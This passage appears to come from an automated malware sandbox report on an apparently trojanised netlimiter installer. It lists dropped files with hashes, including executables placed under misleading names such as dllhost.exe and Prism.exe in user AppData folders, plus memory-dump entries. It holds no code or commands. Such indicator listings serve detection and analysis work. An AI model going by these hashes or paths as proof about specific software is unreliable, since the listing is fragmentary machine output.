57540c56c92cc86f94b47830a00c29f826def28e

SHA256
0eb518251fbe9cf0c9451cc1fef6bb6aee16d62da00b0050c83566da053f68d0

SHA512
fd18976a8fbb7e59b12944c2628dbd66d463b2f7342661c8f67160df37a393fa3c0ce7fdda31073674b7a46e0a0a7d0a7b29ebe0d9488afd9ef8b3a39410b5a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\menubutton.tcl
Filesize
6KB

MD5
fe89894d8cbf415541a60d77192f0f94

SHA1
c0716b2d8e24592757b62d24eeed57121b60e00f

SHA256
d9af20135ef1bfeb3e0fd9fdabe821474de3ed43b3745a42fe564d24a8b9fd9c

SHA512
66488cbcac49cca47c9c560648e891d429f40e46549f58687b98073eba4807a8458a277be093ebfc50709a8a87a529df4e526eccfb60803ce16af17b97accd3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\notebook.tcl
Filesize
5KB

MD5
82c9dfc512e143dda78f91436937d4dd

SHA1
26abc23c1e0c201a217e3cea7a164171418973b0

SHA256
d1e5267cde3d7be408b4c94220f7e1833c9d452bb9ba3e194e12a5eb2f9adb80

SHA512
a9d3c04ad67e0dc3f1c12f9e21ef28a61fa84dbf710313d4ca656bdf35dfbbfba9c268c018004c1f5614db3a1128025d795bc14b4fffaa5603a5313199798d04

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\panedwindow.tcl
Filesize
1KB

MD5
a12915fa5caf93e23518e9011200f5a4

SHA1
a61f665a408c10419fb81001578d99b43d048720

SHA256
ce0053d637b580170938cf552b29ae890559b98eb28038c2f0a23a265ddeb273

SHA512
669e1d66f1223cca6ceb120914d5d876bd3cf401ee4a46f35825361076f19c7341695596a7dbb00d6cff4624666fb4e7a2d8e7108c3c56a12bda7b04e99e6f9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\progress.tcl
Filesize
1KB

MD5
b0074341a4bda36bcdff3ebcae39eb73

SHA1
d070a01cc5a787249bc6dad184b249c4dd37396a

SHA256
a9c34f595e547ce94ee65e27c415195d2b210653a9ffcfb39559c5e0fa9c06f8

SHA512
af23563602886a648a42b03cc5485d84fcc094ab90b08df5261434631b6c31ce38d83a3a60cc7820890c797f6c778d5b5eff47671ce3ee4710ab14c6110dcc35

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\scale.tcl
Filesize
2KB

MD5
b41a9df31924dea36d69cb62891e8472

SHA1
4c2877fbb210fdbbde52ea8b5617f68ad2df7b93

SHA256
25d0fe2b415292872ef7acdb2dfa12d04c080b7f9b1c61f28c81aa2236180479

SHA512
a50db6da3d40d07610629de45f06a438c6f2846324c3891c54c99074cfb7beed329f27918c8a85badb22c6b64740a2053b891f8e5d129d9b0a1ff103e7137d83

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\scrollbar.tcl
Filesize
2KB

MD5
cf7bc1ffbf3efee2ca7369215a3b1473

SHA1
e2632241089f9dc47fa76cd0c57615d70753008c

SHA256
b3a0e10c95b28c90cccfc373152bd30ab7da2fb4c0e96409aeeb01d453f36b4a

SHA512
01841cda93aa0ce1a5b1fc65db153902b872b7e9d1030ef8902e086bbeb35649fd742dd96d1aed9cf620692fde6f4e2ccd865dc7a125452ffd16a65918956dda

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\sizegrip.tcl
Filesize
2KB

MD5
3c8916a58c6ee1d61836e500a54c9321

SHA1
54f3f709698fad020a048668749cb5a09ede35ab

SHA256
717d2edd71076ea059903c7144588f8bbd8b0afe69a55cbf23953149d6694d33

SHA512
2b71569a5a96cac1b708e894a2466b1054c3fae5405e10799b182012141634bd2a7e9e9f516658e1a6d6e9e776e397608b581501a6cfe2eb4ec54459e9ecb267

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\spinbox.tcl
Filesize
4KB

MD5
ebce661f8125f54c7dff9f076fb2bfe2

SHA1
966603a85eadba4e003e8307a7e581cd6839716f

SHA256
7c2ffd7308bdea852851335d5b5eb5dcca0e4d4a0cea16f786b40009ffd58b71

SHA512
35f518e20986ab951ff33091f405ea1647534ccb77c8c36a94b1ab4a973df3ed52355864702b6526888830af8c912105e542027b5d68f81ac2a9f40ad2ba2632

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\treeview.tcl
Filesize
9KB

MD5
5bec78db1a86b4bc17a5108806c5371e

SHA1
4b2b08240f778864c5045f546a620702ae126ccb

SHA256
0e05adf29b616989cb4724e57a26f1044598781f0cc10d5eb5ac4af7d705ddca

SHA512
29dff439bb5caa23f8f38ea136406fa2db68be021068f80bad2e2ec811ae5c5b08f4f287719db946db780122af05654392ea771fb523bdc1569b364689d3ec86

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\ttk.tcl
Filesize
4KB

MD5
e38b399865c45e49419c01ff2addce75

SHA1
f8a79cbc97a32622922d4a3a5694bccb3f19decb

SHA256
61baa0268770f127394a006340d99ce831a1c7ad773181c0c13122f7d2c5b7f6

SHA512
285f520b648f5ec70dd79190c3b456f4d6da2053210985f9e2c84139d8d51908296e4962b336894ee30536f09fae84b912bc2abf44a7011620f66cc5d9f71a8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\utils.tcl
Filesize
8KB

MD5
f868a26a299885824b14ca28f68039ce

SHA1
e37a1889e6cc215102ec078d0455622415ed8486

SHA256
6c35cd6c7f3ac4be3fe0cc7633dbbde5123155921a441ba702b4347e6f967f34

SHA512
14d8fd30fe670ce4630ce5b7b1e4b04a2a3f97d6483d87d0d7a2b675e880ab75e947820a4babd337452d683e0cbb7b92b4c866af19a8dcd5711016e012d597e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\vistaTheme.tcl
Filesize
9KB

MD5
ad2d78020875529834dd0ea74251e2d3

SHA1
80cc99972a056396dd55e9505ccb02e16462b115

SHA256
ce1a53a769de9e230f586efafd2fb455980b45941e5db553bd3a2f0062b50f3e

SHA512
59ec21a44769fec0b462f0675217882ecf5cbc64056024e4259d91233a1397b4b89957bd474387c992a8753dc9c350fda7e6e5c6e9d29c655d62362a018e2194

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\winTheme.tcl
Filesize
2KB

MD5
8b4813a1c6915fd35b52ac854230bcc1

SHA1
db981087f2a311361446014fadbd8b199d856716

SHA256
05fad058280e7a8947a9f71122b442b92d7d578b4618b08bf0b71b6dac5aa22f

SHA512
e0a69e94aabd725b441d6c4920f1cd54451bcc00090d9319cb55286a46a7f35066d1959de149d900198f777671004f6d8a64e7d31e42f8a76e89ed122a79a9ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\xpTheme.tcl
Filesize
2KB

MD5
1026799ffe26aaa8661f64d6f2cbe4dd

SHA1
5cd337feb3130d146134e06c4a1826ba29157e7a

SHA256
ff421674388da5d3a0c687f342f8d1e3c7f247f3cb59d5512b31f91a54a4c318

SHA512
90f1062caa87c0d65aede1d71370ebe35ad90f4033e6077169b7168b4754c0ff46a9f6348f4d907dcf20ab8f63bb6e0d106a05f068c5abeb86d26f5ea00f503c

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\vcruntime140.dll
Filesize
94KB

MD5
11d9ac94e8cb17bd23dea89f8e757f18

SHA1
d4fb80a512486821ad320c4fd67abcae63005158

SHA256
e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e

SHA512
aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778

Download Submit
C:\Users\Admin\AppData\Local\Temp\shiB4D1.tmp
Filesize
4.8MB

MD5
77d6c08c6448071b47f02b41fa18ed37

SHA1
e7fdb62abdb6d4131c00398f92bc72a3b9b34668

SHA256
047e2df9ccf0ce298508ee7f0db0abcb2ff9cff9916b6e8a1fbd806b7a9d064b

SHA512
e1aeb8e8b441d755a119f45a465ca5660678f4131984322252bfb6d2cec52e7ee54d65a64b98429b23915eb5707b04b5cd62a85446c60de8842314130a926dbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\shiE670.tmp
Filesize
76KB

MD5
fdce43712079c189e993ff27df2911bc

SHA1
6f0465aeedb699de995e1c3b25f8f902bc05545f

SHA256
47267b3ddec6deeb0b018afbde2b99d17350329a52f0ae49f66b5edc5fcc4366

SHA512
c09215b7d0f567ed20e08c8b16a6738f07c7631e25f4bcf68f4d072016f509378eb1e9b4d519afa1e19c0aa11d104051d8c47732e39bc48d78be8f5d5696fc71

Download Submit
C:\Users\Admin\AppData\Local\Temp\{63BC5994-B37B-4416-A29E-B2D208BD5CAE}\8BD5CAE\netlimiter-5.3.14.0.x64.msi
Filesize
3.0MB

MD5
d47903476cf152899d8ffc650c013ec8

SHA1
5fa6aa7998aed43c7e648f3b0771044baedc07ad

SHA256
a23fd974e809d4b0643abb123208f257e16ee27b5003f4a178c0fd9c1ae503c2

SHA512
ade8e645c5eb73d49eaa6e27f0bc8ca16ba4b44b731e97bb760e17bee0bd0099a1714b320589257864aa2dec46e67bb55ed6e948d96f918f438519f1d2fd0f9c

Download Submit
C:\Users\Admin\AppData\Local\dllhost.exe
Filesize
74KB

MD5
cc7686bf7c7d81f59196d5cc3cab3348

SHA1
ac39079f223f87d404c421c48239f913b12f00a8

SHA256
49c175257966f191a2abce16d8533d359fc27ecf6512da870a9c59937914d5f7

SHA512
940cfb37c1f5e5dbd86cc14d5a0a85dfaf889754051d4fc0d0afbe7bedceaec91b5f36b873b5e24cd081432db1b7d61df72a198681b9ab8e3a9b57197cfb58ae

Download Submit
C:\Users\Admin\AppData\Roaming\Prism.exe
Filesize
5.0MB

MD5
42e50ba9365d54d40cbf45ee3c6f24db

SHA1
a9f9c39a3710b40369fb20d2e0aa5a9ef2d3e6b7

SHA256
2b02ec22d0ef11d392e29f2d8a58ff55ba49705d00ba8598e8f02fe4fa8e808a

SHA512
5e86c52d655f9c3586e46b6fb20742c6a0795234b59cb88d25497d2465d621b7a1de45ff67be207a3cb700a812bdd8dcb399c0c8debe529be512fb1434230756

Download Submit
C:\Users\Admin\Downloads\netlimiter-5.3.14.0.exe
Filesize
10.3MB

MD5
d7236661463ab9e967eb8612d795fece

SHA1
53de81ddc66ee2fbc7519a55de370bc1e9442cbe

SHA256
f41253001076fdd8b8fb578cf485ee4d280139ecac0913093fb8117841c903ec

SHA512
15d812dace9753ae1c90dd5b4f0947da8125a264081b208831a28f5c3a60174b27a3ede2a1aae8cc282caf828250319e8ac8fd0f44ab0f34c308883633d49426

Download Submit
C:\Windows\Installer\MSIA54.tmp
Filesize
111KB

MD5
d43bbc352c53cae4f64f210a07be4294

SHA1
ee78edf9a6978a2149abc81d73960ef393294881

SHA256
35cb6f6b026656a7125519eae7f4d24bf842fa2e42ae4cffef2154fc88e96550

SHA512
0bcde747773e8789bc21b5ae6e6ce249252fed23c9c9682f6ecdbe5d2b3d3a09c328e95df4fa74816dbc9889b9075f774145a7e82da2f6d644f475964f550593

Download Submit
C:\Windows\Installer\MSIF34B.tmp
Filesize
721KB

MD5
4972f92ac846c16a429f4f37cf484f75

SHA1
aad22a78ba9bc8ed68fec16a3ca8199c86ecd4f8

SHA256
c5e6774ae1bca5e3dc68b98ba6a81d65fc7089e93d03841479dc05c5191dccdb

SHA512
2563bc5379c8fdb47bad791ddb22f9a6c7ea996e013bed3898ddcfa974311cc7f0e0593261ea5400775c9079a654a031d1ae0d1ebf2af36c5f075c8d6b2114d5

Download Submit
C:\Windows\Installer\{63BC5994-B37B-4416-A29E-B2D208BD5CAE}\nl_icon.exe
Filesize
155KB

MD5
51f5ac81127ed601d421a5d77a44291a

SHA1
b4e459b3e2543ad7e4212c07facdfd5baafcfa25

SHA256
6f42e47637a6c90897e4643f470d64a798a42aeea77f0c97e81ed8aed972409b

SHA512
9df1457fdab6459d6f1f79545f684466e374341d6887df954779f990342a8a208b30f1cdc2bad4ad5e5397c030e487d3bf46197168b6e69f6f53354718423825

Download Submit
memory/1876-1032-0x0000000075020000-0x000000007506C000-memory.dmp

Filesize
304KB

Download
memory/1876-1067-0x0000000007640000-0x0000000007648000-memory.dmp

Filesize
32KB

Download
memory/1876-16-0x0000000073A9E000-0x0000000073A9F000-memory.dmp

Filesize
4KB

Download
memory/1876-959-0x0000000005AD0000-0x0000000005E24000-memory.dmp

Filesize
3.3MB

Download
memory/1876-1045-0x0000000007270000-0x0000000007313000-memory.dmp

Filesize
652KB

Download
memory/1876-1031-0x0000000006670000-0x00000000066A2000-memory.dmp

Filesize
200KB

Download
memory/1876-1046-0x0000000007430000-0x000000000743A000-memory.dmp

Filesize
40KB

Download
memory/1876-1044-0x0000000006650000-0x000000000666E000-memory.dmp

Filesize
120KB

Download
memory/1876-1049-0x0000000007650000-0x00000000076E6000-memory.dmp

Filesize
600KB

Download
memory/1876-88-0x00000000052D0000-0x00000000058F8000-memory.dmp

Filesize
6.2MB

Download
memory/1876-1066-0x00000000076F0000-0x000000000770A000-memory.dmp

Filesize
104KB

Download
memory/1876-1065-0x0000000007610000-0x0000000007624000-memory.dmp

Filesize
80KB

Download
memory/1876-1050-0x00000000075C0000-0x00000000075D1000-memory.dmp

Filesize
68KB

Download
memory/1876-1064-0x0000000007600000-0x000000000760E000-memory.dmp

Filesize
56KB

Download
memory/2448-1060-0x000001C2FD310000-0x000001C2FD332000-memory.dmp

Filesize
136KB

Download
memory/2448-1063-0x000001C2FCFF0000-0x000001C2FD20C000-memory.dmp

Filesize
2.1MB

Download
memory/2860-25-0x00000000008E0000-0x00000000008F8000-memory.dmp

Filesize
96KB

Download
memory/2920-1080-0x0000020480560000-0x000002048077C000-memory.dmp

Filesize
2.1MB

Download
memory/3628-1105-0x0000024750C10000-0x0000024750E2C000-memory.dmp

Filesize
2.1MB

Download
memory/4216-987-0x0000000006050000-0x000000000609C000-memory.dmp

Filesize
304KB

Download
memory/4216-952-0x0000000004FF0000-0x0000000005056000-memory.dmp

Filesize
408KB

Download
memory/4216-1048-0x00000000073F0000-0x0000000007482000-memory.dmp

Filesize
584KB

Download
memory/4216-1107-0x0000000073A90000-0x0000000074240000-memory.dmp

Filesize
7.7MB

Download
memory/4216-1033-0x0000000007650000-0x0000000007CCA000-memory.dmp

Filesize
6.5MB

Download
memory/4216-1043-0x0000000006540000-0x000000000655A000-memory.dmp

Filesize
104KB

Download
memory/4216-22-0x0000000073A90000-0x0000000074240000-memory.dmp

Filesize
7.7MB

Download
memory/4216-950-0x0000000004F50000-0x0000000004F72000-memory.dmp

Filesize
136KB

Download
memory/4216-21-0x0000000002A70000-0x0000000002AA6000-memory.dmp

Filesize
216KB

Download
memory/4216-953-0x0000000005160000-0x00000000051C6000-memory.dmp

Filesize
408KB

Download
memory/4216-986-0x0000000006020000-0x000000000603E000-memory.dmp

Filesize
120KB

Download
memory/4216-1047-0x0000000008280000-0x0000000008824000-memory.dmp

Filesize
5.6MB

Download
memory/4292-1214-0x000002AF15370000-0x000002AF15371000-memory.dmp

Filesize
4KB

Download
memory/4292-1224-0x000002AF15370000-0x000002AF15371000-memory.dmp

Filesize
4KB

Download
memory/4292-1225-0x000002AF15370000-0x000002AF15371000-memory.dmp

Filesize
4KB

Download
memory/4292-1215-0x000002AF15370000-0x000002AF15371000-memory.dmp

Filesize
4KB

Download
memory/4292-1223-0x000002AF15370000-0x000002AF15371000-memory.dmp

Filesize
4KB

Download
memory/4292-1222-0x000002AF15370000-0x000002AF15371000-memory.dmp

Filesize
4KB

Download
memory/4292-1219-0x000002AF15370000-0x000002AF15371000-memory.dmp

Filesize
4KB

Download
memory/4292-1213-0x000002AF15370000-0x000002AF15371000-memory.dmp

Filesize
4KB

Download
memory/4292-1221-0x000002AF15370000-0x000002AF15371000-memory.dmp

Filesize
4KB

Download
memory/4292-1220-0x000002AF15370000-0x000002AF15371000-memory.dmp

Filesize
4KB

Download